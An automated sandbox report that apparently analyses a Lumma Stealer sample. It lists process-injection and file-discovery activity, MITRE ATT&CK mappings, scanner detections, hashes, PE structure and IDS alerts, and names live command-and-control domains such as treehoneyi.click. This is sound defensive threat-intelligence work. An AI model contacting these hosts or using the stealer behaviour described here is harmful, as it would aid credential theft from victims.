                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\XZXHAVGRAG
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: number of queries: 1001
Source: Yara match | File source: 00000002.00000003.2029632902.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2029943183.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1976536875.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2029593311.0000000002AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2028308961.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 7676, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matched signatures for techniques observed in this analysis, techniques without a number were not observed):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
• Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd
• Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
• Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
• Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (311); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1)
• Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
• Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (2); System Information Discovery (22)
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
• Collection: Data from Local System (41); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
• Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Source | Detection | Scanner | Label
MPySEh8HaF.exe | 55% | ReversingLabs | Win32.Spyware.Lummastealer
MPySEh8HaF.exe | 58% | Virustotal | -
MPySEh8HaF.exe | 100% | Avira | HEUR/AGEN.1309172
No Antivirus matches
Source | Detection | Scanner | Label
https://treehoneyi.click/Y | 0% | Avira URL Cloud | safe
https://treehoneyi.click/) | 0% | Avira URL Cloud | safe
https://treehoneyi.click/apiOH | 0% | Avira URL Cloud | safe
https://treehoneyi.click/api0 | 0% | Avira URL Cloud | safe
https://treehoneyi.click:443/apin.txtPK | 0% | Avira URL Cloud | safe
https://treehoneyi.click/B | 0% | Avira URL Cloud | safe
https://treehoneyi.click/s | 0% | Avira URL Cloud | safe
https://treehoneyi.click/h | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
treehoneyi.click | 172.67.180.113 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
necklacebudi.lat | false | - | high
aspecteirs.lat | false | - | high
energyaffai.lat | false | - | high
treehoneyi.click | false | - | high
https://treehoneyi.click/api | false | - | high
sustainskelet.lat | false | - | high
crosshuaht.lat | false | - | high
rapeflowwj.lat | false | - | high
grannyejh.lat | false | - | high
discokeyus.lat | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.180.113 | treehoneyi.click | United States | 13335 | CLOUDFLARENET US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580844
Start date and time: 2024-12-26 12:00:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: MPySEh8HaF.exe (renamed because the original name is a hash value)
Original Sample Name: 58cffd92455eec9cd613ede591ed6c2c.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BitLockerToGo.exe, PID 7676, because there are no executed functions
• Execution Graph export aborted for target MPySEh8HaF.exe, PID 7420, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:01:25 | API Interceptor | 8x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.180.113 | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine |
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig |
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig |
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Vidar, Xmrig |
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT |
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar |
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
 | AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
treehoneyi.click | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 172.67.180.113
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 104.21.91.209
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 172.67.180.113
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 104.21.91.209
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 172.67.180.113
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Vidar, Xmrig | 172.67.180.113
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 104.21.91.209
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT | 104.21.91.209
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 172.67.180.113
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 172.67.180.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Dotc67890990.exe | malicious | Snake Keylogger | 104.21.27.85
 | 67VB5TS184.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
 | http://booking.extranetguests.com/ | malicious | CAPTCHA Scam ClickFix | 172.67.220.52
 | ciwa.mp4.hta | malicious | LummaC, PureLog Stealer | 104.21.94.92
 | Google Authenticator You're trying to sign in from a new location.msg | malicious | Unknown | 162.159.128.61
 | xd.arm7.elf | malicious | Mirai | 162.159.16.108
 | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
 | https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com | malicious | HTMLPhisher | 172.67.167.59
 | Set-up.exe | malicious | LummaC | 172.67.214.186
 | setup.exe | malicious | LummaC | 172.67.151.193
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | malicious | DBatLoader, FormBook | 172.67.180.113
 | ciwa.mp4.hta | malicious | LummaC, PureLog Stealer | 172.67.180.113
 | Set-up.exe | malicious | LummaC | 172.67.180.113
 | setup.exe | malicious | LummaC | 172.67.180.113
 | Set-up.exe | malicious | LummaC Stealer | 172.67.180.113
 | SET_UP.exe | malicious | LummaC | 172.67.180.113
 | 00000.ps1 | malicious | LummaC | 172.67.180.113
 | 123.ps1 | malicious | LummaC | 172.67.180.113
 | Setup.exe | malicious | LummaC | 172.67.180.113
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 6.372940988179131
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: MPySEh8HaF.exe
File size: 7'409'664 bytes
MD5: 58cffd92455eec9cd613ede591ed6c2c
SHA1: 388ef427a8f87c9e20a1cb7408b7bd4e81ed4117
SHA256: a7c488cf2a71ee29da1d9267bd7d3bc9f9e4d5ff1c2da0db5669e0af44a232e8
SHA512: e41cf7e38b19826667fcb4d933458b5f976ba343b1ae07bab5e3c7bc1750c59224b1280f0afcff8552126aabe15c468bee706dbe55003acb3143247b64e9180e
SSDEEP: 49152:HaGYgu3W0tm+q+en0+qwZ8x1r9xxDtlg9RNPi8qqNTiFOnLPLbWicCW+drNu0I4b:6tGZPNiekumY58ZSggJPLJvyLHefPUG
TLSH: 0F766B90F9DB54F5DA03193014A7627F53305E098B24CB87FA6C7F6AEF77A920932609
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(o...............2..@.......J........b...@..........................@t.......q...@................................
Icon Hash: 5571717145496155
Entrypoint: 0x464a80
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: 9cbefe68f395e67356e2a5d8d1b285c0
Instruction (disassembly at entrypoint)
jmp 00007F8510803FE0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007F8510806319h
mov eax, 00000000h
jmp 00007F8510806376h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007F8510806317h
call 00007F8510806409h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007F851080632Ah
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
mov edx, dword ptr [ecx]
mov eax, esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x700000 | 0x3dc | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x725000 | 0x1e5b5 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x701000 | 0x2234c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x62cfc0 | 0xa0 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x328775 | 0x328800 | 366839e41de1a466fcba48f4d577a30a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x32a000 | 0x3019c4 | 0x301a00 | 617683e83d99a090dc761597a12f73c0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x62c000 | 0xd3628 | 0xa5a00 | 33efe1ea055f3e5178353d2d50da8b27 | False | 0.4575029481132076 | data | 5.647032850172966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x700000 | 0x3dc | 0x400 | 870c902ca2142c4e773c15cba68df9d6 | False | 0.48828125 | data | 4.566261873246425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x701000 | 0x2234c | 0x22400 | 0e99a7ce117cb2e4ab42c915b52f1150 | False | 0.593022924270073 | data | 6.651526525504227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x724000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x725000 | 0x1e5b5 | 0x1e600 | 72d8aa85360d6593bb1fcdd13314ca7d | False | 0.37333622685185186 | data | 5.540714448763649 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x725234 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | English | United States | 0.6613475177304965
RT_ICON | 0x72569c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | English | United States | 0.4474671669793621
RT_ICON | 0x726744 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | English | United States | 0.3934647302904564
RT_ICON | 0x728cec | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | English | United States | 0.31471421823334905
RT_ICON | 0x72cf14 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | English | United States | 0.17295634685910327
RT_ICON | 0x73d73c | 0x53b0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004667662434652
RT_GROUP_ICON | 0x742aec | 0x5a | data | English | United States | 0.7444444444444445
RT_VERSION | 0x742b48 | 0x308 | data | | | 0.4639175257731959
RT_MANIFEST | 0x742e50 | 0x765 | XML 1.0 document, ASCII text, with very long lines (324), with CRLF line terminators | English | United States | 0.358161648177496
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T12:01:25.214023+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:25.996826+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49735 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:25.996826+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49735 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:27.363336+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.180.113 | 443 | TCP
2024-12-26T12:01:28.174922+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49737 | 172.67.180.113 | 443 | TCP
